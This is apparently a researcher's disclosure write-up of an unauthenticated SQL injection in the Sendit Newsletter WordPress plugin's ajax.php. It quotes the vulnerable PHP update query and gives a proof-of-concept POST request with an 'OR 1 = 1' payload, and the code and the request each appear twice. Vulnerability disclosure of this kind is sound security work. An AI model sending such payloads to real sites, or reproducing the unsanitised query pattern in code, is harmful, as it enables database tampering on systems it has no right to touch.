Sendit Newsletter | ceriksen.com

Advisory
Secunia Advisory SA 49506

Analysis
A SQL injection vulnerability exists in the ajax.php file of the Sendit Newsletter plugin for WordPress, which is used for setting the subscribed or unsubscribed flag on an email.

By passing in an arbitrary key-pair value, we see that because of line 9, it will use the key-pair for the SET statement on line 17/27 without any validation. It will also explode(Split into an array) the ID value on line 10 and 11 and put the “ID” into a variable later used, without validating that it is an integer. This is then also used on line 17/27, and is also exploitable.

include("../../../wp-blog-header.php");
status_header(200);
nocache_headers();
require_once 'libs/actions.php';
global $wpdb;
//print_r($_POST);
//let me parse
foreach($_POST as $k=>$v):
    $id= explode("-", $_POST['id']);
    $id=$id[1];

    if($k!='id'):
        if($k!='email'):
            //serializer update
            $subscriber_info=json_encode($_POST);
            $update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");     
            //$update="update ".SENDIT_EMAIL_TABLE." set subscriber_info = '$subscriber_info' where id_email = $id";
            if($v=='y') { $confirmed='confirmed'; $style='vertical-align:middle; background:#E4FFCF;'; } 
            elseif($v=='d') {$confirmed='unsubscribed'; $style='vertical-align:middle; background:#fd919b';} 
            elseif($v=='n') {$confirmed='not confirmed'; $style='vertical-align:middle; background:#fffbcc;';} 
            else {}
            echo '<div style="'.$style.'display:block;height:35px">';
                echo $confirmed;
            echo '</div>';
        else:   
            $update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

            echo $v;
        endif;
    endif;

include("../../../wp-blog-header.php");

status_header(200);

nocache_headers();

require_once 'libs/actions.php';

global $wpdb;

//print_r($_POST);

//let me parse

foreach($_POST as $k=>$v):

$id= explode("-", $_POST['id']);

$id=$id[1];

if($k!='id'):

if($k!='email'):

//serializer update

$subscriber_info=json_encode($_POST);

$update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

//$update="update ".SENDIT_EMAIL_TABLE." set subscriber_info = '$subscriber_info' where id_email = $id";

if($v=='y') { $confirmed='confirmed'; $style='vertical-align:middle; background:#E4FFCF;'; }

elseif($v=='d') {$confirmed='unsubscribed'; $style='vertical-align:middle; background:#fd919b';}

elseif($v=='n') {$confirmed='not confirmed'; $style='vertical-align:middle; background:#fffbcc;';}

else {}

echo '<div style="'.$style.'display:block;height:35px">';

echo $confirmed;

echo '</div>';

else:

$update=$wpdb->query("update ".SENDIT_EMAIL_TABLE." set $k = '$v' where id_email = $id");

echo $v;

endif;

Because this call does not require any sort of authentication, we can make a simple POST request to exploit this and inject SQL:

POST /wordpress/wp-content/plugins/sendit/ajax.php? HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

id=1-52179 OR 1 = 1 ;-3&thiskeygoesintothequery=settingthevaluetothis

POST /wordpress/wp-content/plugins/sendit/ajax.php? HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 71

id=1-52179 OR 1 = 1 ;-3&thiskeygoesintothequery=settingthevaluetothis